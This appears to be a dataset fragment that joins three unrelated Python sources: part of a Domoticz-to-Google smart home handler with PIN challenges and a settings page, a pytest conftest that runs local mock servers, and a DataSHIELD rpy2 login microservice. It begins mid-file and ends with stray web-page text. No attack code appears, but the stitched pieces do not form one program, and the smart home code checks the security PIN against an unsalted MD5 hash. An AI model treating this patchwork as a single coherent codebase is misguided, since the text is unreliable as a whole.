"""Execute a command.
https://developers.google.com/actions/smarthome/create-app#actiondevicesexecute
"""
executed = False
for trt in self.traits():
if trt.can_execute(command, params):
acknowledge = self.state.ack # ack is now stored in state
pincode = False
if configuration['Domoticz']['switchProtectionPass']:
protect = self.state.protected
else:
protect = False
if protect or self.state.domain == domains['security']:
pincode = configuration['Domoticz']['switchProtectionPass']
if self.state.domain == domains['security']:
pincode = self.state.seccode
acknowledge = False
if challenge is None:
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'pinNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif not challenge.get('pin', False):
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'userCancelled',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif True == protect and pincode != challenge.get('pin'):
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'challengeFailedPinNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif self.state.domain == domains['security'] and pincode != hashlib.md5(
str.encode(challenge.get('pin'))).hexdigest():
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'challengeFailedPinNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
if acknowledge:
if challenge is None:
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'ackNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif not challenge.get('ack', False):
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'userCancelled',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
trt.execute(command, params)
executed = True
break
if not executed:
raise SmartHomeError(ERR_FUNCTION_NOT_SUPPORTED,
'Unable to execute {} for {}'.format(command, self.state.entity_id))
def async_update(self):
"""Update the entity with latest info from Domoticz."""
if self.state.domain == domains['group'] or self.state.domain == domains['scene']:
getDevices('scene')
else:
getDevices('id', self.state.id)
class SmartHomeReqHandler(OAuthReqHandler):
global smarthomeControlMappings
global aogDevs
def __init__(self, *args, **kwargs):
super(SmartHomeReqHandler, self).__init__(*args, **kwargs)
self._request_id = None
def report_state(self, states, token):
"""Send a state report to Google."""
data = {
'requestId': self._request_id,
'agentUserId': token.get('userAgentId', None),
'payload': {
'devices': {
'states': states,
}
}
}
ReportState.call_homegraph_api(REPORT_STATE_BASE_URL, data)
def smarthome_process(self, message, token):
request_id = self._request_id # type: str
inputs = message.get('inputs') # type: list
if len(inputs) != 1:
return {
'requestId': request_id,
'payload': {'errorCode': ERR_PROTOCOL_ERROR}
}
handler = smarthomeControlMappings.get(inputs[0].get('intent'))
if handler is None:
return {'requestId': request_id, 'payload': {'errorCode': ERR_PROTOCOL_ERROR}}
try:
result = handler(self, inputs[0].get('payload'), token)
return {'requestId': request_id, 'payload': result}
except SmartHomeError as err:
return {'requestId': request_id, 'payload': {'errorCode': err.code}}
except Exception as e:
logger.error(e)
return {'requestId': request_id, 'payload': {'errorCode': ERR_UNKNOWN_ERROR}}
def smarthome_post(self, s):
logger.debug(s.headers)
a = s.headers.get('Authorization', None)
token = None
if a is not None:
types, tokenH = a.split()
if types.lower() == 'bearer':
token = Auth['tokens'].get(tokenH, None)
if token is None:
raise SmartHomeError(ERR_PROTOCOL_ERROR, 'not authorized access!!')
message = json.loads(s.body)
self._request_id = message.get('requestId')
logger.info("Request " + json.dumps(message, indent=2, sort_keys=True, ensure_ascii=False))
response = self.smarthome_process(message, token)
try:
if 'errorCode' in response['payload']:
logger.error('Error handling message %s: %s' % (message, response['payload']))
except:
pass
s.send_json(200, json.dumps(response, ensure_ascii=False).encode('utf-8'), True)
def smarthome(self, s):
s.send_message(500, "not supported")
def forceDevicesSync(self):
userAgent = self.getUserAgent()
enableReport = ReportState.enable_report_state()
if userAgent is None:
return 500 # internal error
data = {"agentUserId": userAgent}
if enableReport:
r = ReportState.call_homegraph_api(REQUEST_SYNC_BASE_URL, data)
elif 'Homegraph_API_Key' in configuration and configuration['Homegraph_API_Key'] != 'ADD_YOUR HOMEGRAPH_API_KEY_HERE':
r = ReportState.call_homegraph_api_key(REQUEST_SYNC_BASE_URL, data)
else:
logger.error("No configuration for request_sync available")
return r
def syncDevices(self, s):
user = self.getSessionUser()
if user is None or user.get('uid', '') == '':
s.redirect('login?redirect_uri={0}'.format('sync'))
return
r = self.forceDevicesSync()
s.send_message(200, 'Synchronization request sent, status_code: ' + str(r))
def restartServer(self, s):
user = self.getSessionUser()
if user is None or user.get('uid', '') == '':
s.redirect('login?redirect_uri={0}'.format('restart'))
return
s.send_message(200, 'Restart request sent, status_code: True')
restartServer()
def settings(self, s):
user = self.getSessionUser()
if user is None or user.get('uid', '') == '':
s.redirect('login?redirect_uri={0}'.format('settings'))
return
update = checkupdate()
confJSON = json.dumps(configuration)
public_url = getTunnelUrl()
message = ''
meta = '<!-- <meta http-equiv="refresh" content="5"> -->'
code = readFile(os.path.join(FILE_DIR, CONFIGFILE))
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
def settings_post(self, s):
enableReport = ReportState.enable_report_state()
update = checkupdate()
confJSON = json.dumps(configuration)
public_url = getTunnelUrl()
logs = readFile(os.path.join(logfilepath, LOGFILE))
code = readFile(os.path.join(FILE_DIR, CONFIGFILE))
meta = '<!-- <meta http-equiv="refresh" content="5"> -->'
if s.form.get("save"):
textToSave = s.form.get("save", None)
codeToSave = textToSave.replace("+", " ")
saveFile(CONFIGFILE, codeToSave)
message = 'Config saved'
logger.info(message)
logs = readFile(os.path.join(logfilepath, LOGFILE))
code = readFile(os.path.join(FILE_DIR, CONFIGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
if s.form.get("backup"):
codeToSave = readFile(os.path.join(FILE_DIR, CONFIGFILE))
saveFile('config/config.yaml.bak', codeToSave)
message = 'Backup saved'
logger.info(message)
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
if s.form.get("restart"):
message = 'Restart Server, please wait a minute!'
meta = '<meta http-equiv="refresh" content="20">'
code = ''
logs = ''
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
restartServer()
if s.form.get("sync"):
if 'Homegraph_API_Key' in configuration and configuration['Homegraph_API_Key'] != 'ADD_YOUR HOMEGRAPH_API_KEY_HERE' or enableReport == True:
r = self.forceDevicesSync()
time.sleep(0.5)
if r:
message = 'Devices syncronized'
else:
message = 'Homegraph api key not valid!'
else:
message = 'Add Homegraph api key or a Homegraph Service Account json file to sync devices here!'
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
if s.form.get("reload"):
message = ''
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
if s.form.get("deletelogs"):
logfile = os.path.join(logfilepath, LOGFILE)
if os.path.exists(logfile):
f = open(logfile, 'w')
f.close()
logger.info('Logs removed by user')
message = 'Logs removed'
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
if s.form.get("update"):
repo.git.reset('--hard')
repo.remotes.origin.pull()
message = 'Updating to latest ' + branch + ', please wait a minute!'
meta = '<meta http-equiv="refresh" content="20">'
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
subprocess.call(['pip', 'install','-r', os.path.join(FILE_DIR, 'requirements/pip-requirements.txt')])
restartServer()
def delay_report_state(self, states, token):
time.sleep(3)
self.report_state(states, token)
def smarthome_sync(self, payload, token):
"""Handle action.devices.SYNC request.
https://developers.google.com/actions/smarthome/create-app#actiondevicessync
"""
devices = []
states = {}
aogDevs.clear()
getDevices() # sync all devices
getSettings()
enableReport = ReportState.enable_report_state()
agent_user_id = token.get('userAgentId', None)
for state in aogDevs.values():
entity = _GoogleEntity(state)
serialized = entity.sync_serialize(agent_user_id)
if serialized is None:
continue
devices.append(serialized)
if state.report_state:
try:
states[entity.entity_id] = entity.query_serialize()
except:
continue
if enableReport:
t = threading.Thread(target=self.delay_report_state, args=(states, token)).start()
response = {'agentUserId': agent_user_id, 'devices': devices}
return response
def smarthome_query(self, payload, token):
"""Handle action.devices.QUERY request.
https://developers.google.com/actions/smarthome/create-app#actiondevicesquery
"""
enableReport = ReportState.enable_report_state()
response = {}
devices = {}
getDevices()
for device in payload.get('devices', []):
devid = device['id']
#_GoogleEntity(aogDevs.get(devid, None)).async_update()
state = aogDevs.get(devid, None)
if not state:
# If we can't find a state, the device is offline
devices[devid] = {'online': False}
continue
e = _GoogleEntity(state)
devices[devid] = e.query_serialize()
response = {'devices': devices}
logger.info("Response " + json.dumps(response, indent=2, sort_keys=True, ensure_ascii=False))
if state.report_state == True and enableReport == True:
self.report_state(devices, token)
return {'devices': devices}
def smarthome_exec(self, payload, token):
"""Handle action.devices.EXECUTE request.
https://developers.google.com/actions/smarthome/create-app#actiondevicesexecute
"""
entities = {}
results = {}
for command in payload['commands']:
for device, execution in product(command['devices'],
command['execution']):
entity_id = device['id']
# Happens if error occurred. Skip entity for further processing
if entity_id in results:
continue
if entity_id not in entities:
if len(aogDevs) == 0:
getDevices()
getSettings()
state = aogDevs.get(entity_id, None)
if state is None:
results[entity_id] = {'ids': [entity_id], 'status': 'ERROR', 'errorCode': ERR_DEVICE_OFFLINE}
continue
entities[entity_id] = _GoogleEntity(state)
try:
entities[entity_id].execute(execution['command'], execution.get('params', {}),
execution.get('challenge', None))
except SmartHomeError as err:
results[entity_id] = {'ids': [entity_id], 'status': 'ERROR', 'errorCode': err.code}
logger.error(err)
except SmartHomeErrorNoChallenge as err:
results[entity_id] = {'ids': [entity_id], 'status': 'ERROR', 'errorCode': err.code,
'challengeNeeded': {'type': err.desc}}
logger.error(err)
final_results = list(results.values())
for entity in entities.values():
if entity.entity_id in results:
continue
entity.async_update()
final_results.append({'ids': [entity.entity_id], 'status': 'SUCCESS', 'states': entity.query_serialize()})
return {'commands': final_results}
def smarthome_disconnect(self, payload, token):
"""Handle action.devices.DISCONNECT request.
https://developers.google.com/assistant/smarthome/develop/process-intents#DISCONNECT
"""
return None
if 'userinterface' in configuration and configuration['userinterface'] == True:
smarthomeGetMappings = {"/gapi/smarthome": SmartHomeReqHandler.smarthome,
"/gapi/sync": SmartHomeReqHandler.syncDevices,
"/settings": SmartHomeReqHandler.settings,
"/restart": SmartHomeReqHandler.restartServer}
smarthomePostMappings = {"/gapi/smarthome": SmartHomeReqHandler.smarthome_post,
"/settings": SmartHomeReqHandler.settings_post}
else:
smarthomeGetMappings = {"/smarthome": SmartHomeReqHandler.smarthome,
"/sync": SmartHomeReqHandler.syncDevices,
"/restart": SmartHomeReqHandler.restartServer}
smarthomePostMappings = {"/smarthome": SmartHomeReqHandler.smarthome_post}
smarthomeControlMappings = {'action.devices.SYNC': SmartHomeReqHandler.smarthome_sync,
'action.devices.QUERY': SmartHomeReqHandler.smarthome_query,
'action.devices.EXECUTE': SmartHomeReqHandler.smarthome_exec,
'action.devices.DISCONNECT': SmartHomeReqHandler.smarthome_disconnect}
|
conftest.py
|
try:
from http import server
except ImportError:
import BaseHTTPServer as server
import socket
import threading
import pytest
from tests.servers import login_server as login_mock
from tests.servers import api_server as api_mock
@pytest.fixture(scope="session")
def login_server_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(("localhost", 0))
address, port = s.getsockname()
s.close()
return port
@pytest.fixture(scope="session")
def login_server(login_server_port):
mock_server = server.HTTPServer(
("localhost", login_server_port), login_mock.MockLoginServer
)
mock_server_thread = threading.Thread(target=mock_server.serve_forever)
mock_server_thread.setDaemon(True)
mock_server_thread.start()
return mock_server
@pytest.fixture(scope="session")
def api_server_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(("localhost", 0))
address, port = s.getsockname()
s.close()
return port
@pytest.fixture(scope="session")
def api_server(api_server_port):
mock_server = server.HTTPServer(
("localhost", api_server_port), api_mock.MockApiServer
)
mock_server_thread = threading.Thread(target=mock_server.serve_forever)
mock_server_thread.setDaemon(True)
mock_server_thread.start()
return mock_server
|
login.py
|
import uuid as _uuid
from threading import Thread
import importlib.util
from pathlib import Path
import rpy2
import rpy2.rinterface
import rpy2.rinterface_lib
from rpy2.robjects.packages import importr
from rpy2.robjects import r
import fdrtd.server
from fdrtd.server.microservice import Microservice
try:
from fdrtd.plugins.protocol_DataSHIELD.src import helpers
except ImportError:
spec_helpers = importlib.util.spec_from_file_location('helpers', Path(__file__).resolve().parent / 'helpers.py')
helpers = importlib.util.module_from_spec(spec_helpers)
spec_helpers.loader.exec_module(helpers)
consolewrite_warnerror_backup = rpy2.rinterface_lib.callbacks.consolewrite_warnerror
consolewrite_print_backup = rpy2.rinterface_lib.callbacks.consolewrite_print
base = importr('base')
DSI = importr('DSI')
DSOpal = importr('DSOpal')
dsBaseClient = importr('dsBaseClient')
grDevices = importr('grDevices')
jsonlite_R = importr('jsonlite')
class Login(Microservice):
def __init__(self, bus, endpoint):
super().__init__(bus, endpoint)
self.storage = {}
self.connection_callbacks_storage = {}
def login(self, list_of_servers, parameters=None, **kwargs):
if parameters is None:
parameters = {}
parameters.update(kwargs)
uuid = str(_uuid.uuid4())
self.storage[uuid] = {'warnerror': [], 'print': [], 'busy': True}
Thread(target=self.login_helper, args=(uuid, list_of_servers, parameters), daemon=True).start()
return self.callback(uuid)
def login_helper(self, uuid, list_of_servers, parameters):
rpy2.rinterface_lib.callbacks.consolewrite_warnerror = lambda e: self.storage[uuid]['warnerror'].append(e)
rpy2.rinterface_lib.callbacks.consolewrite_print = lambda e: self.storage[uuid]['print'].append(e)
builder = r('builder%s <- DSI::newDSLoginBuilder()' % uuid.replace('-', ''))
for server in list_of_servers:
try:
builder['append'](**server)
except Exception as err:
self.storage[uuid]['busy'] = False
raise helpers.handle_error(str(err), 'login')
try:
connection = r('connections%s <- DSI::datashield.login(%s)'
% (uuid.replace('-', ''), helpers.login_params_string_builder(parameters, uuid)))
except Exception as err:
self.storage[uuid]['busy'] = False
raise helpers.handle_error(str(err), 'login')
self.storage[uuid]['busy'] = False
connection_microservice_uuid = self.bus.select_microservice(
requirements={'protocol': 'DataSHIELD', 'microservice': 'connection'}
)
self.connection_callbacks_storage[uuid] = self.bus.call_microservice(
handle=connection_microservice_uuid,
function='connect',
parameters={'connection': connection, 'uuid': uuid}
)
return None
def get_status(self, callback):
try:
return self.storage[callback]
except KeyError:
raise fdrtd.server.exceptions.InvalidParameter(f'uuid {callback}', 'not found')
def get_result(self, callback):
try:
return self.connection_callbacks_storage[callback]
except KeyError:
fdrtd.server.exceptions.InvalidParameter(f'uuid {callback}', 'not found')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.